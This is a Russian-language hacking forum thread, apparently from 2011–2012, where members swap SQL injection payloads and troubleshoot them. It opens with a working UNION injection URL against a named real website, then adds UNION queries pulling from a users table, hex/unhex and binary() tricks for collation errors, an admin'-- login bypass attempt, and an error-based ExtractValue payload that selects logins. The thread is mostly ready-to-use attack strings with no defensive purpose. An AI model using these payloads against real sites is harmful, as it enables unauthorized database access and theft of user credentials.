18.07.2011, 15:39
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
С нами:
9503537
Репутация:
0
|
|
Сообщение от Expl0ited
Код:
http://www.earthcharter.ru/index.php?cnt=86)and(1=0)union(select(version()),2,3,4,5,6,7)--+
Круто! Спасибо!
Где такому учат? Здесь все 19 страниц прочитал, ничего подбного не встречал
|
|
|
18.07.2011, 15:47
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Ээээм, учебник по SQL?
|
|
|
|
18.07.2011, 15:48
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от netruxa
Круто! Спасибо!
Где такому учат? Здесь все 19 страниц прочитал, ничего подбного не встречал
Учат синтаксис, тип запросов, функции MySQL- dev.mysql.com. А не статьи по использованию SQL-инъекций.
|
|
|
|
18.07.2011, 17:31
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
С нами:
9503537
Репутация:
0
|
|
ну вот это объясните пожалуйста
86)and(1=0)
по идеи, если 1=0 должен false возвращаться и вообще ничего не должно выводиться?
|
|
|
|
01.08.2011, 14:59
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
С нами:
9503537
Репутация:
0
|
|
Подскажите, пожалуйста, как решается эта проблема?
Сообщение от None
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_unicode_ci,IMPLICIT) for operation 'UNION'
Запрос вида
Сообщение от None
-1%27+union+select+*+from+(select+1,2,3,4,5,6)a,use rs,(select+1,2,3,4,5,6,7,8)b+--+
версия БД 4.1.12-standard-log, поэтому решил так извратиться
версию узнавал таким образом
Сообщение от None
-1%27+union+select+1,2,3,4,5,6,hex(version()),8,9,1 0,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,29+--+
если hex() не писать, то вылазит ошибка, которая в самом начале поста |
|
|
|
01.08.2011, 16:05
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
unhex(hex(version()))
в статье разве этого нет?
|
|
|
|
01.08.2011, 16:10
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
С нами:
9503537
Репутация:
0
|
|
Да когда одна переменная, понятно, что ее мона захексить и разхексить.
а что делать при таком формате запроса?
-1'+union+select+*+from+(select+1,2,3,4,5,6)a, users,(select+1,2,3,4,5,6,7,8)b+--+
|
|
|
|
05.01.2012, 00:03
|
|
Познающий
Регистрация: 02.02.2011
Сообщений: 91
С нами:
8039126
Репутация:
0
|
|
в чем трабла ? ошибка в поле логин, все время пишет
Message: MySQL Query fail: SELECT user_pass, user_salt, user_groupid, user_id FROM `users` WHERE user_name = ''--'
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
пробовал зайти как админ прописав в логине admin'-- , но никак..
пробовал group и order писать , тоже ноль .
через union не получается
|
|
|
|
29.01.2012, 11:42
|
|
Познающий
Регистрация: 19.07.2010
Сообщений: 91
С нами:
8324246
Репутация:
19
|
|
Re: 4.3 Проблемы с кодировками
Есть еще функция binary() которая выводит все как есть.
И никаких проблем с кодировкой.
SELECT binary(user()) FROM mysql.user
И никаких unhex(hex()) не требуется.
Проверено временем и дорогами.
|
|
|
|
01.03.2012, 18:34
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 14
С нами:
8959612
Репутация:
10
|
|
Подскажите пожалуйста как в concat запихать insert, да так, чтобы пробелы были заменены чем либо. Вот как делается select (спасибо M_Script):
Код:
(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
